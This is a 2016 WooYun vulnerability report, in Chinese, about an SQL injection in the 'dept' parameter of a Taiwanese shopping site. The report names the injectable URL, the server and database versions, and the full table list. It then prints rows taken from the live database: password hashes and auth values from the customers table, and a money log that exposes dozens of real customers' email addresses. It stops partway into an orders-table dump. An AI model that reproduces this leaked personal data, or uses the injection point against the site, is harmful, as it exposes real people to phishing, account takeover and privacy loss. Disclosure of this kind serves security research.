当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177514

漏洞标题:万事OK www主站SQL注入可导致百万信息泄露(用户名/密码/邮箱/电话/订单信息/资金等)(臺灣地區)

相关厂商:ONCEOK

漏洞作者: 暴走

提交时间:2016-02-21 22:54

修复时间:2016-02-26 23:00

公开时间:2016-02-26 23:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-21: 细节已通知厂商并且等待厂商处理中
2016-02-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL Injection Problem.

详细说明:

万事OK生活市集(http://www.onceok.com.tw/)主站首页:

1.png

漏洞证明:

SQL注入地址(注入参数:dept)
http://www.onceok.com.tw/menuitems.php?dept=food&id=

5.png


current-db:onceok,包含148个表,百万级数据

Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
Database: onceok
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| tb_ok_search | 1360718 |
| pagetrack | 372247 |
| tb_ok_order_status_log | 221458 |
| tb_ok_stock | 214566 |
| orders_items | 140758 |
| tb_ok_shipment_d | 92416 |
| tb_ok_customer_login_log | 85001 |
| tb_ok_also_purchased_temp_items | 69125 |
| tb_ok_goods_sales_day | 53384 |
| view_ok_goods_sales_day | 53384 |
| tb_ok_also_purchased_match | 49622 |
| tb_ok_also_purchased_temp_match | 49622 |
| tb_ok_atm_file_contain | 45951 |
| tb_ok_http_referer | 42545 |
| customers | 41587 |
| tb_ok_credit_debug_log | 41415 |
| tb_ok_goods_sales_week | 40497 |
| view_ok_goods_sales_week | 40497 |
| orders_info | 39810 |
| epaper | 37597 |
| tb_ok_goods_log | 36855 |
| orders_infobak | 32609 |
| view_ok_customer_order | 28387 |
| tb_ok_debug_logs | 28327 |
| tb_ok_shipment_m | 27792 |
| view_ok_ship_return | 27792 |
| view_ok_ship_item_check | 27357 |
| view_ok_order_item_check | 27316 |
| tb_ok_goods_sales_month | 26218 |
| view_ok_goods_sales_month | 26218 |
| invo_prt | 25661 |
| tb_ok_money_log | 25092 |
| tb_ok_users_log | 24086 |
| tb_ok_customer_order | 23723 |
| shopping_cart | 19203 |
| goods_inventory_log | 17896 |
| tb_ok_atm_file | 17415 |
| tb_ok_http_referer_order | 17392 |
| view_ok_http_referer_order | 17392 |
| customers_epaper | 16372 |
| customers_fix | 15634 |
| tb_ok_also_purchased_order | 15299 |
| view_ok_money | 15190 |
| company_contacts | 9772 |
| tb_ok_order_rec | 9554 |
| tb_ok_survey | 8800 |
| tb_ok_goods_sales_year | 8053 |
| view_ok_goods_sales_year | 8053 |
| tb_ok_goods_qa | 6855 |
| tb_ok_serial | 6381 |
| tb_ok_store_log | 6210 |
| tb_ok_order_qa | 5704 |
| view_ok_goods_type | 4307 |
| view_ok_goods_sales_all_info | 4298 |
| tb_ok_stores_sales_month | 2835 |
| check_log | 2834 |
| tb_ok_goods_sales_all | 2549 |
| view_ok_goods_sales_all | 2549 |
| pagetrack_transation | 2415 |
| view_ok_stores_type | 2132 |
| orders_full_amount | 1757 |
| tb_ok_serial_test | 1329 |
| tb_ok_user_role | 562 |
| ip_view_pool | 491 |
| tb_ok_idx_temp | 480 |
| tb_ok_cat_temp | 396 |
| tb_ok_scenic | 336 |
| tb_ok_scenic_content | 335 |
| tb_ok_keyword | 291 |
| stores_detail | 264 |
| stores_info | 263 |
| view_ok_store_sales_info | 256 |
| tb_ok_users | 249 |
| goods_inventory | 239 |
| tb_ok_role_ap | 194 |
| view_ok_goods_full_amount | 136 |
| idx_special | 108 |
| tb_ok_return_d | 95 |
| tb_ok_goods_monthly_sales_list | 76 |
| view_ok_goods_monthly_sales_list | 76 |
| idx_choice | 73 |
| tb_ok_ap | 68 |
| invo_range | 54 |
| tb_ok_return_m | 49 |
| blog_type | 42 |
| orders_status | 36 |
| goods_type | 30 |
| invo_lotto | 28 |
| city | 26 |
| forums_topic_type | 26 |
| hot_news | 26 |
| tb_ok_goods_weekly_sales_list | 26 |
| view_ok_goods_weekly_sales_list | 26 |
| goods_subtype | 24 |
| idx_pic_config | 23 |
| tb_ok_freight | 19 |
| tb_ok_http_referer_setup | 12 |
| tb_ok_money_type | 11 |
| tb_ok_role | 11 |
| tb_ok_survey_item | 11 |
| view_search_keywords_yahoo | 11 |
| idx_search | 8 |
| stores_area | 7 |
| tb_ok_return_status | 6 |
| idx_store | 5 |
| tb_ok_banner | 5 |
| forums_topic_status | 4 |
| tb_ok_shipment_status | 4 |
| customer_facebook | 3 |
| depts_info | 3 |
| stores_special | 3 |
| config | 1 |
| invo_reprt | 1 |
| tb_ok_ship_seq | 1 |
+----------------------------------+---------+


找了下和user表相关的:
customers表(包含41587的用户):

Database: onceok
Table: customers
[46 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| position | varchar(10) |
| address | varchar(150) |
| auth | varchar(32) |
| bday | tinyint(3) unsigned |
| birthday | varchar(10) |
| blog | varchar(200) |
| bmonth | tinyint(3) unsigned |
| byear | int(10) unsigned |
| career | varchar(5) |
| cdate | datetime |
| city | varchar(10) |
| CREATE_DATE | datetime |
| CREATE_USER | varchar(100) |
| credit_card | varchar(1) |
| DATESTAMP | datetime |
| description | varchar(100) |
| district | varchar(10) |
| education | varchar(1) |
| email | varchar(100) |
| email_epaper | varchar(1) |
| email_premium | varchar(1) |
| facebook | varchar(50) |
| fax_01 | varchar(16) |
| fax_02 | varchar(16) |
| fburl | varchar(200) |
| free_sepecial | tinyint(4) |
| gender | varchar(1) |
| google | varchar(100) |
| id | varchar(100) |
| identification | varchar(10) |
| income | varchar(10) |
| info | varchar(50) |
| ldate | datetime |
| mobile | varchar(10) |
| name | varchar(20) |
| ok_money_total | int(11) |
| ok_ranking | int(11) |
| password | varchar(60) |
| status | varchar(1) |
| tel_day | varchar(30) |
| tel_night | varchar(16) |
| uid | int(11) unsigned |
| user_id | varchar(100) |
| USERSTAMP | varchar(100) |
| yahoo | varchar(100) |
| zip | varchar(5) |
+----------------+---------------------+


还是老样子,跑几条数据示意下,由于字段多,就跑了个4个用户信息(包含useid、邮箱、电话、密码等信息)

web server operating system: Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL 5
Database: onceok
Table: customers
[4 entries]
+----------------------------------------------+-------+----------------------------------------------+----------------+---------+----------+------+------+----------------------------------+----------+------+---------------------+-------+----------------------------------------------+-------+---------------------+-------+--------+--------+--------+--------+--------+--------+--------+--------+------------+---------+--------------------+----------+----------+----------+-------------------------------------+----------------------------------------------+-----------+-----------+---------------------+------------+------------+---------------------+----------------------------------------------+-------------+-------------+--------------+---------------+---------------+----------------+
| id | uid | user_id | identification | zip | city | blog | bday | auth | name | info | ldate | fburl | email | yahoo | cdate | byear | google | bmonth | fax_01 | income | status | fax_02 | career | gender | mobile | tel_day | address | district | birthday | facebook | password | USERSTAMP | tel_night | education | DATESTAMP | position | ok_ranking | CREATE_DATE | CREATE_USER | description | credit_card | email_epaper | email_premium | free_sepecial | ok_money_total |
+----------------------------------------------+-------+----------------------------------------------+----------------+---------+----------+------+------+----------------------------------+----------+------+---------------------+-------+----------------------------------------------+-------+---------------------+-------+--------+--------+--------+--------+--------+--------+--------+--------+------------+---------+--------------------+----------+----------+----------+-------------------------------------+----------------------------------------------+-----------+-----------+---------------------+------------+------------+---------------------+----------------------------------------------+-------------+-------------+--------------+---------------+---------------+----------------+
| \nset|set&set\n | 39753 | \nset|set&set\n | NULL | <blank> | <blank> | NULL | 2 | 3843048c065168e11477dac06b6f4d38 | lxjrxsph | NULL | 2015-03-20 05:28:53 | NULL | \nset|set&set\n | NULL | 0000-00-00 00:00:00 | 2010 | NULL | 1 | NULL | NULL | N | NULL | NULL | M | 987-65-432 | <blank> | 3137 Laguna Street | <blank> | <blank> | NULL | 139f63cbecd687fb25de9a36b30e15f7:bb | \nset|set&set\n | <blank> | NULL | 2015-03-20 05:28:53 | NULL | 0 | 2015-03-20 05:28:53 | \nset|set&set\n | NULL | NULL | 0 | 1 | 0 | 0 |
| \nSomeCustomInjectedHeader:injected_by_wvs | 33696 | \nSomeCustomInjectedHeader:injected_by_wvs | NULL | 51800 | shenzhen | NULL | 0 | 3843048c065168e11477dac06b6f4d38 | 88888 | NULL | 2012-12-03 13:02:15 | NULL | \nSomeCustomInjectedHeader:injected_by_wvs | NULL | 0000-00-00 00:00:00 | 0 | NULL | 0 | NULL | NULL | N | NULL | NULL | M | 1388888888 | 01 | <blank> | 88888 | 01 | NULL | fd97ce997d1e40bb34acfbd2ae53eaea:c7 | \nSomeCustomInjectedHeader:injected_by_wvs | <blank> | NULL | 2012-12-03 13:02:15 | NULL | 0 | 2012-12-03 13:02:15 | \nSomeCustomInjectedHeader:injected_by_wvs | NULL | NULL | 0 | 1 | 0 | 0 |
| \r\nSomeCustomInjectedHeader:injected_by_wvs | 33695 | \r\nSomeCustomInjectedHeader:injected_by_wvs | NULL | 51800 | shenzhen | NULL | 0 | 3843048c065168e11477dac06b6f4d38 | 88888 | NULL | 2012-12-03 13:02:14 | NULL | \r\nSomeCustomInjectedHeader:injected_by_wvs | NULL | 0000-00-00 00:00:00 | 0 | NULL | 0 | NULL | NULL | N | NULL | NULL | M | 1388888888 | 01 | <blank> | 88888 | 01 | NULL | 062b9f6d8642c88cb14ee16e38c139d1:6d | \r\nSomeCustomInjectedHeader:injected_by_wvs | <blank> | NULL | 2012-12-03 13:02:14 | NULL | 0 | 2012-12-03 13:02:14 | \r\nSomeCustomInjectedHeader:injected_by_wvs | NULL | NULL | 0 | 1 | 0 | 0 |
| \rSomeCustomInjectedHeader:injected_by_wvs | 39712 | NULL | <blank> | NULL | 1 | 3843048c065168e11477dac06b6f4d38 | ssxxpacn | NULL | 2015-03-20 05:06:24 | NULL | \rSomeCustomInjectedHeader:injected_by_wvs | 0000-00-00 00:00:00 | 2010 | NULL | 2 | NULL | NULL | N | NULL | NULL | M | 987-65-432 | <blank> | 3137 Laguna Street | <blank> | <blank> | NULL | 78050c84fa1c11f8290ef2949ca86f9d:99 | \rSomeCustomInjectedHeader:injected_by_wvs | <blank> | NULL | 2015-03-20 05:06:24 | NULL | 0 | 2015-03-20 05:06:24 | \rSomeCustomInjectedHeader:injected_by_wvs | NULL | NULL | 0 | 1 | 0 | 0 |
+----------------------------------------------+-------+----------------------------------------------+----------------+---------+----------+------+------+----------------------------------+----------+------+---------------------+-------+----------------------------------------------+-------+---------------------+-------+--------+--------+--------+--------+--------+--------+--------+--------+------------+---------+--------------------+----------+----------+----------+-------------------------------------+----------------------------------------------+-----------+-----------+---------------------+------------+------------+---------------------+----------------------------------------------+-------------+-------------+--------------+---------------+---------------+----------------+


在看下tb_ok_money_log表(因为有money...,应该是消费的钱数吧.)

Database: onceok
Table: tb_ok_money_log
[7 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| content | varchar(50) |
| create_date | datetime |
| create_user | varchar(50) |
| id | int(10) unsigned |
| ok_money | int(11) |
| otype | char(3) |
| uid | int(11) |
+-------------+------------------+


几十万数据,那就继续看几条:

Database: onceok
Table: tb_ok_money_log
[25092 entries]
+-------+-------+-------+--------------------------------------------+----------+---------------------+-----------------------------------------+
| id | uid | otype | content | ok_money | create_date | create_user |
+-------+-------+-------+--------------------------------------------+----------+---------------------+-----------------------------------------+
| 1 | 4938 | B01 | GL12100042 | 1400 | 2006-12-18 16:08:09 | 80117761 |
| 2 | 3518 | B01 | GL12100053 | 450 | 2006-12-20 12:23:09 | 29420797 |
| 3 | 4938 | B01 | GL1310001B | 440 | 2006-12-22 16:09:50 | 27493127 |
| 4 | 4938 | B01 | HA0810001B | 2000 | 2007-01-09 11:23:26 | 09000602 |
| 5 | 7537 | B01 | HA0810002A | 9430 | 2007-01-17 11:17:51 | 27488503 |
| 6 | 9396 | B01 | HA1710001A | 1150 | 2007-01-23 11:22:22 | 29420797 |
| 7 | 9575 | B01 | HA17100032 | 590 | 2007-01-18 15:25:06 | 27493127 |
| 8 | 7987 | B01 | HA1810001A | 1040 | 2007-01-19 09:58:17 | 27493127 |
| 9 | 10381 | B01 | HA1910001A | 700 | 2007-01-22 15:54:43 | 49997880 |
| 10 | 4938 | B01 | HA22100022 | 1290 | 2007-01-23 16:57:36 | 73858108 |
| 11 | 4938 | B01 | HA22100044 | 900 | 2007-01-22 19:54:45 | 49997880 |
| 12 | 10886 | B01 | HA25100011 | 360 | 2007-01-26 17:19:03 | 12926907 |
| 13 | 4478 | B01 | HA28100011 | 290 | 2007-01-29 18:47:04 | 27493127 |
| 14 | 3677 | B01 | HA30100012 | 800 | 2007-02-01 17:43:24 | 80117761 |
| 15 | 3928 | B01 | HA31100023 | 1050 | 2007-02-01 11:18:16 | 33193302 |
| 16 | 7215 | B01 | HB0110001B | 610 | 2007-02-05 11:49:02 | 09544200 |
| 17 | 1755 | B01 | HB0310001B | 2635 | 2007-02-07 10:17:37 | 60596406 |
| 18 | 4938 | B01 | HB0510001B | 1880 | 2007-02-06 15:11:41 | 09544200 |
| 19 | 4938 | B01 | HB07100031 | 4200 | 2007-02-09 19:03:54 | 49997880 |
| 20 | 4463 | B01 | HB0810001B | 4005 | 2007-02-09 13:09:31 | 09544200 |
| 21 | 8177 | B01 | HB0810002A | 580 | 2007-02-09 13:12:09 | 09544200 |
| 22 | 11404 | B01 | HB0910001B | 1240 | 2007-02-10 10:48:40 | 09544200 |
| 23 | 12055 | B01 | HB10100021 | 540 | 2007-02-13 14:44:14 | 09544200 |
| 24 | 12055 | B01 | HB1110001A | 630 | 2007-02-13 14:47:07 | 09544200 |
| 25 | 8268 | B01 | HB11100021 | 530 | 2007-02-15 17:42:14 | 05157634 |
| 26 | 1806 | B01 | HB12100021 | 500 | 2007-02-13 13:28:11 | 14251490 |
| 27 | 12200 | B01 | HB12100032 | 1550 | 2007-02-13 17:59:02 | 19243745 |
| 28 | 1329 | B01 | HB12100043 | 640 | 2007-02-13 14:46:14 | 09544200 |
| 29 | 7537 | B01 | HB12100054 | 7040 | 2007-02-15 15:38:08 | 15692473 |
| 30 | 8306 | B01 | HB12100065 | 440 | 2007-02-13 14:46:33 | 09544200 |
| 31 | 7537 | B01 | HB12100076 | 3300 | 2007-02-15 15:38:59 | 15692473 |
| 32 | 5009 | B01 | HB12100087 | 455 | 2007-02-13 14:44:42 | 09544200 |
| 33 | 11610 | B01 | HB1310001A | 490 | 2007-02-13 15:32:10 | 73858108 |
| 34 | 3573 | B01 | HB13100021 | 1310 | 2007-02-14 11:00:17 | 80117761 |
| 35 | 4657 | B01 | HB13100032 | 1120 | 2007-02-14 19:19:26 | 27697608 |
| 36 | 11236 | B01 | HB13100043 | 1040 | 2007-02-14 19:20:13 | 27697608 |
| 37 | 7210 | B01 | HB1410001A | 620 | 2007-02-15 17:42:46 | 05157634 |
| 38 | 241 | B01 | HB1510001A | 7050 | 2007-02-16 14:38:13 | 73858108 |
| 39 | 6451 | B01 | HB15100032 | 1040 | 2007-02-15 16:43:47 | 09544200 |
| 40 | 513 | B01 | HB15100043 | 1140 | 2007-02-15 16:43:29 | 09544200 |
| 41 | 5035 | B01 | HB21100011 | 420 | 2007-04-12 08:31:30 | admin |
| 42 | 12459 | B01 | HB28100011 | 2140 | 2007-04-12 08:32:20 | admin |
| 43 | 11703 | B01 | HC0110001B | 550 | 2007-04-12 08:32:02 | admin |
| 44 | 8893 | B01 | HC0210001B | 870 | 2007-04-12 08:32:32 | admin |
| 45 | 12914 | B01 | HC0210002A | 440 | 2007-04-12 08:32:45 | admin |
| 46 | 9955 | B01 | HC0410001B | 355 | 2007-04-12 08:32:58 | admin |
| 47 | 12594 | B01 | HC0510001B | 310 | 2007-04-12 08:33:23 | admin |
| 48 | 8468 | B01 | HC0510002A | 750 | 2007-04-12 08:33:12 | admin |
| 49 | 7924 | B01 | HC0610001B | 1250 | 2007-04-12 08:33:37 | admin |
| 50 | 1459 | B01 | HC0610002A | 660 | 2007-04-12 08:33:50 | admin |
| 51 | 4938 | B01 | HC06100042 | 490 | 2007-04-12 08:34:12 | admin |
| 52 | 8893 | B01 | HC06100053 | 5310 | 2007-04-12 08:34:26 | admin |
| 53 | 4938 | B01 | HC07100031 | 3400 | 2007-04-12 08:34:40 | admin |
| 54 | 6362 | B01 | HC07100042 | 1350 | 2007-04-12 08:34:56 | admin |
| 55 | 1719 | B01 | HC0810001B | 1650 | 2007-05-15 18:56:11 | admin |
| 56 | 9768 | B01 | HC0810002A | 1160 | 2007-04-12 08:35:23 | admin |
| 57 | 1222 | B01 | HC0910001B | 500 | 2007-04-12 08:36:42 | admin |
| 58 | 3929 | B01 | HC10100021 | 1050 | 2007-04-12 08:37:03 | admin |
| 59 | 11580 | B01 | HC1110001A | 3355 | 2007-04-12 08:56:10 | admin |
| 60 | 5110 | B01 | HC1210001A | 1050 | 2007-04-12 08:54:48 | admin |
| 61 | 9955 | B01 | HC12100021 | 1310 | 2007-04-12 08:53:42 | admin |
| 62 | 4938 | B01 | HC1310001A | 1500 | 2007-04-12 08:55:22 | admin |
| 63 | 566 | B01 | HC13100032 | 1100 | 2007-04-12 08:55:45 | admin |
| 64 | 4583 | B01 | HC13100043 | 2540 | 2007-04-12 08:58:01 | admin |
| 65 | 4323 | B01 | HC14100021 | 1050 | 2007-04-12 08:58:25 | admin |
| 66 | 7284 | B01 | HC1510001A | 730 | 2007-04-12 08:58:49 | admin |
| 67 | 10362 | B01 | HC15100032 | 1000 | 2007-04-12 08:59:08 | admin |
| 68 | 4938 | B01 | HC1610001A | 1045 | 2007-04-12 08:59:25 | admin |
| 69 | 4938 | B01 | HC16100021 | 18700 | 2007-04-12 09:07:02 | admin |
| 70 | 13027 | B01 | HC1710001A | 1555 | 2007-04-12 08:59:55 | admin |
| 71 | 2769 | B01 | HC1810001A | 850 | 2007-04-12 08:59:42 | admin |
| 72 | 8972 | B01 | HC18100021 | 890 | 2007-04-12 11:46:40 | admin |
| 73 | 7244 | B01 | HC19100032 | 1350 | 2007-04-12 09:00:11 | admin |
| 74 | 8706 | B01 | HC20100011 | 1670 | 2007-04-12 11:40:29 | admin |
| 75 | 4936 | B01 | HC20100033 | 2800 | 2007-04-12 11:47:58 | admin |
| 76 | 5463 | B01 | HC20100044 | 1200 | 2007-04-12 09:07:14 | admin |
| 77 | 7537 | B01 | HC21100011 | 10150 | 2007-04-12 11:39:36 | admin |
| 78 | 2625 | B01 | HC23100022 | 845 | 2007-04-12 11:47:01 | admin |
| 79 | 8877 | B01 | HC23100033 | 400 | 2007-04-12 11:47:34 | admin |
| 80 | 8229 | B01 | HC24100011 | 2500 | 2007-04-12 11:48:16 | admin |
| 81 | 11279 | B01 | HC26100022 | 2500 | 2007-04-12 11:48:36 | admin |
| 82 | 11481 | B01 | HC27100022 | 2501 | 2007-04-12 11:49:03 | admin |
| 83 | 7537 | B01 | HC27100033 | 3400 | 2007-04-12 11:51:03 | admin |
| 84 | 7537 | B01 | HC27100044 | 500 | 2007-04-12 11:50:39 | admin |
| 85 | 253 | B01 | HC28100022 | 2545 | 2007-04-12 11:49:33 | admin |
| 86 | 6076 | B01 | HC28100033 | 550 | 2007-04-12 11:49:58 | admin |
| 87 | 10380 | B01 | HC28100044 | 2360 | 2007-04-12 11:50:17 | admin |
| 88 | 8254 | B01 | HC29100011 | 460 | 2007-04-12 11:51:18 | admin |
| 89 | 7537 | B01 | HC29100022 | 4345 | 2007-04-12 11:51:37 | admin |
| 90 | 3518 | B01 | HC29100033 | 4440 | 2007-04-12 11:52:10 | admin |
| 91 | 3518 | B01 | HC29100044 | 590 | 2007-04-12 11:52:28 | admin |
| 92 | 8481 | B01 | HC29100055 | 895 | 2007-04-12 20:12:25 | admin |
| 93 | 8481 | B01 | HC29100066 | 1010 | 2007-04-12 13:24:15 | admin |
| 94 | 1378 | B01 | HC29100077 | 1300 | 2007-04-12 13:24:31 | admin |
| 95 | 2780 | B01 | HC30100023 | 2255 | 2007-04-12 13:25:11 | admin |
| 96 | 7414 | B01 | HC31100012 | 1000 | 2007-04-12 13:25:41 | admin |
| 97 | 3687 | B01 | HD0110001B | 6165 | 2007-04-12 13:25:54 | admin |
| 98 | 792 | B01 | HD01100031 | 2500 | 2007-04-12 13:27:39 | admin |
| 99 | 4807 | B01 | HD0210002A | 1285 | 2007-04-12 13:26:08 | admin |
| 100 | 7537 | B01 | HD02100031 | 2575 | 2007-04-12 13:27:56 | admin |
| 101 | 4807 | B01 | HD02100042 | 1245 | 2007-04-12 13:26:25 | admin |
| 102 | 11726 | B01 | HD02100053 | 2500 | 2007-04-12 13:26:39 | admin |
| 103 | 7537 | B01 | HD02100064 | 2530 | 2007-04-12 13:28:13 | admin |
| 104 | 7537 | B01 | HD03100031 | 8670 | 2007-04-12 13:29:44 | admin |
| 105 | 5028 | B01 | HD03100042 | 1200 | 2007-04-12 13:28:34 | admin |
| 106 | 5028 | B01 | HD03100053 | 1080 | 2007-04-12 13:29:31 | admin |
| 107 | 12080 | B01 | HD0410001B | 3300 | 2007-04-12 13:30:00 | admin |
| 108 | 9978 | B01 | HD0510002A | 1270 | 2007-04-12 13:30:18 | admin |
| 109 | 5443 | B01 | HD0610002A | 700 | 2007-04-18 15:31:01 | admin |
| 110 | 10999 | B01 | HD0710001B | 300 | 2007-04-12 13:33:08 | admin |
| 111 | 6361 | B01 | HD0910001B | 930 | 2007-04-18 15:42:46 | admin |
| 112 | 7390 | B01 | HD0910002A | 1425 | 2007-04-12 13:36:18 | admin |
| 113 | 6902 | B01 | HD09100031 | 510 | 2007-04-18 15:28:16 | admin |
| 114 | 4657 | B01 | HD09100042 | 800 | 2007-04-18 15:40:18 | admin |
| 115 | 4966 | B01 | HD09100053 | 930 | 2007-04-18 15:33:56 | admin |
| 116 | 11279 | B01 | HD1010001A | 1390 | 2007-04-18 15:38:41 | admin |
| 117 | 5153 | B01 | HD10100032 | 2835 | 2007-04-18 15:47:04 | admin |
| 118 | 8893 | B01 | HD10100043 | 1210 | 2007-05-03 16:40:02 | sa11 |
| 119 | 8755 | B01 | HD1110001A | 1340 | 2007-04-18 15:50:40 | admin |
| 120 | 12674 | B01 | HD12100021 | 1320 | 2007-04-18 15:53:32 | admin |
| 121 | 2519 | B01 | HD12100032 | 570 | 2007-04-18 16:13:14 | admin |
| 122 | 6013 | B01 | HD12100043 | 960 | 2007-04-18 16:06:19 | admin |
| 123 | 12907 | B01 | HD12100054 | 380 | 2007-04-18 16:16:52 | admin |
| 124 | 11690 | B01 | HD1310001A | 1760 | 2007-04-18 16:09:28 | admin |
| 125 | 10533 | B01 | HD14100021 | 2020 | 2007-04-18 16:19:43 | admin |
| 126 | 5395 | B01 | HD15100032 | 860
...
| 24735 | 14838 | R01 | ?? x80731@yahoo.com.tw | 100 | 2009-05-22 23:45:50 | x80731@yahoo.com.tw |
| 24736 | 14839 | R01 | ?? horse.s3737@yahoo.com.tw | 100 | 2009-04-10 01:03:59 | horse.s3737@yahoo.com.tw |
| 24737 | 14840 | R01 | ?? jaangher@ms1.chb.com.tw | 100 | 2009-05-23 20:10:56 | jaangher@ms1.chb.com.tw |
| 24738 | 14841 | R01 | ?? 1000110@hchg.gov.tw | 100 | 2009-05-15 11:35:05 | 1000110@hchg.gov.tw |
| 24739 | 14842 | R01 | ?? patinukho@gmail.com | 100 | 2009-05-24 18:13:30 | patinukho@gmail.com |
| 24740 | 14843 | R01 | ?? cplssharon@yahoo.com.tw | 100 | 2009-05-30 12:50:40 | cplssharon@yahoo.com.tw |
| 24741 | 14844 | R01 | ?? hgoods.wu@msa.hinet.net | 100 | 2009-05-24 22:47:57 | hgoods.wu@msa.hinet.net |
| 24742 | 14845 | R01 | ?? n7553262@yahoo.com.tw | 100 | 2009-05-23 15:57:24 | n7553262@yahoo.com.tw |
| 24743 | 14846 | R01 | ?? tscc120895089@yahoo.com.tw | 100 | 2009-05-24 18:16:50 | tscc120895089@yahoo.com.tw |
| 24744 | 14847 | R01 | ?? unys57@yahoo.com.tw | 100 | 2009-05-22 15:39:47 | unys57@yahoo.com.tw |
| 24745 | 14848 | R01 | ?? bob0225@ms15.hinet.net | 100 | 2009-05-10 22:17:37 | bob0225@ms15.hinet.net |
| 24746 | 14849 | R01 | ?? suntsefu@yahoo.com.tw | 100 | 2009-05-05 22:25:09 | suntsefu@yahoo.com.tw |
| 24747 | 14850 | R01 | ?? s860998@yahoo.com.tw | 100 | 2009-05-24 19:49:29 | s860998@yahoo.com.tw |
| 24748 | 14851 | R01 | ?? jsdruf@yahoo.com.tw | 100 | 2009-05-22 19:30:38 | jsdruf@yahoo.com.tw |
| 24749 | 14852 | R01 | ?? lichinmama@hotmail.com | 100 | 2009-05-04 18:29:14 | lichinmama@hotmail.com |
| 24750 | 14853 | R01 | ?? jeanshen888@gmail.com | 100 | 2009-05-24 06:51:33 | jeanshen888@gmail.com |
| 24751 | 14854 | R01 | ?? linda@translator.com.tw | 100 | 2009-05-04 17:59:34 | linda@translator.com.tw |
| 24752 | 14855 | R01 | ?? shy200415@yahoo.com.tw | 100 | 2009-05-09 16:45:06 | shy200415@yahoo.com.tw |
| 24753 | 14856 | R01 | ?? lina@mailet.com.tw | 100 | 2009-05-19 08:44:33 | lina@mailet.com.tw |
| 24754 | 14857 | R01 | ?? rick@mailnet.com.tw | 100 | 2009-05-11 10:53:27 | rick@mailnet.com.tw |
| 24755 | 14858 | R01 | ?? eutychus@ms85.url.com.tw | 100 | 2009-04-28 20:19:26 | eutychus@ms85.url.com.tw |
| 24756 | 14859 | R01 | ?? tonysew@ms3.hinet.net | 100 | 2009-05-21 17:21:55 | tonysew@ms3.hinet.net |
| 24757 | 14860 | R01 | ?? ann6002.taipei@msa.hinet.net | 100 | 2009-05-10 22:12:41 | ann6002.taipei@msa.hinet.net |
| 24758 | 14861 | R01 | ?? lin55539@yahoo.com.tw | 100 | 2009-04-11 23:48:28 | lin55539@yahoo.com.tw |
| 24759 | 14862 | R01 | ?? d540471@yahoo.com.tw | 100 | 2009-05-26 17:24:05 | d540471@yahoo.com.tw |
| 24760 | 14863 | R01 | ?? HE3107@YAHOO.COM.TW | 100 | 2009-05-10 09:37:44 | HE3107@YAHOO.COM.TW |
| 24761 | 14864 | R01 | ?? sernawwjd@gmail.com | 100 | 2009-04-14 23:15:40 | sernawwjd@gmail.com |
| 24762 | 14865 | R01 | ?? vicky801106@yahoo.com.tw | 100 | 2009-04-18 22:34:28 | vicky801106@yahoo.com.tw |
| 24763 | 14866 | R01 | ?? hidemi3184@hotmail.com | 100 | 2009-05-05 15:27:24 | hidemi3184@hotmail.com |
| 24764 | 14867 | R01 | ?? kaof5718@gmail.com | 100 | 2009-05-10 20:51:32 | kaof5718@gmail.com |
| 24765 | 14868 | R01 | ?? shuhuei213@yahoo.com.tw | 100 | 2009-05-08 13:43:15 | shuhuei213@yahoo.com.tw |
| 24766 | 14869 | R01 | ?? suan@sbtex.com.tw | 100 | 2009-05-03 18:11:24 | suan@sbtex.com.tw |
| 24767 | 14870 | R01 | ?? crown-hope01@crown-hope.com.tw | 100 | 2009-05-22 15:56:11 | crown-hope01@crown-hope.com.tw |
| 24768 | 14871 | R01 | ?? ming046.year018@msa.hinet.net | 100 | 2009-05-10 12:30:42 | ming046.year018@msa.hinet.net |
| 24769 | 14872 | R01 | ?? hsmsign@yahoo.com.tw | 100 | 2009-05-12 20:32:17 | hsmsign@yahoo.com.tw |
| 24770 | 14873 | R01 | ?? mom0126@pchome.com.tw | 100


还有订单信息表orders_info(几十万订单信息,包含各种信息...应有尽有)

Database: onceok
Table: orders_info
[45 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| AMT | int(6) |
| authcode | varchar(10) |
| CANCEL_DATE | date |
| CANCEL_USER | varchar(20) |
| cdate | datetime |
| CREATE_DATE | datetime |
| CREATE_USER | varchar(50) |
| customer_id | varchar(50) |
| DATESTAMP | datetime |
| description | varchar(200) |
| discount | int(11) |
| err_msg | varchar(100) |
| extra_product | varchar(500) |
| free_full_amount | tinyint(4) |
| free_special | tinyint(4) |
| id | varchar(10) |
| INV_DATE | date |
| INV_DONATE | tinyint(1) |
| INV_NO | varchar(10) |
| INV_SDATE | date |
| INV_TITLE | varchar(50) |
| INV_TYPE | varchar(1) |
| ip_address | varchar(15) |
| memo | varchar(500) |
| NON_TAX_AMT | int(6) |
| ok_money_order | int(11) |
| order_status | varchar(8) |
| order_total | int(8) |
| pay_account | varchar(34) |
| pay_mode | varchar(10) |
| receive_date | date |
| receiver_address | varchar(200) |
| receiver_city | varchar(10) |
| receiver_district | varchar(10) |
| receiver_gender | varchar(1) |
| receiver_mobile | varchar(10) |
| receiver_name | varchar(20) |
| receiver_tel | varchar(30) |
| receiver_time | varchar(1) |
| receiver_zip | varchar(5) |
| TAX | int(6) |
| TAX_ID | varchar(8) |
| uid | int(10) unsigned |
| USERSTAMP | varchar(50) |
| VAMT | int(11) |
+-------------------+------------------+


再来看几条数据:

Database: onceok
Table: orders_info
[8 entries]
+------------+------+--------+--------------------------+------+------+------+---------+---------------------+---------+---------------------------------+----------+----------+----------+----------+----------+--------------------------+-----------+-----------+---------------------+------------+---------------+---------------------+--------------------------+-------------+-------------+----------------+---------------------------------------------------------+-------------+-------------+------------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+----------------+-----------------+-----------------+------------------+------------------+-------------------+
